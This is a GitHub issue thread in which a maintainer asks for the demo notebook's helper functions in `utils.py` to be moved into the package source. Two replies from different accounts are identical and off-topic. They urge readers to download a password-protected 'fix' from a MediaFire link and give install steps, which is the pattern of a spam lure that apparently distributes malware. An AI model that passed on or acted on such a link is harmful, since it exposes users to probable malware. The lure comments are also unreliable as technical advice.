### ISSUE TITLE
Cleanup and refactor demo notebook and `utils.py`

### ISSUE THREAD

**Issue by kvantricht** [WorldCereal/worldcereal-classification#135]
For now, many helper functions were defined in `utils.py` next to the demo notebook. This needs refactoring so core functionality is moved into `src` of the package.

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
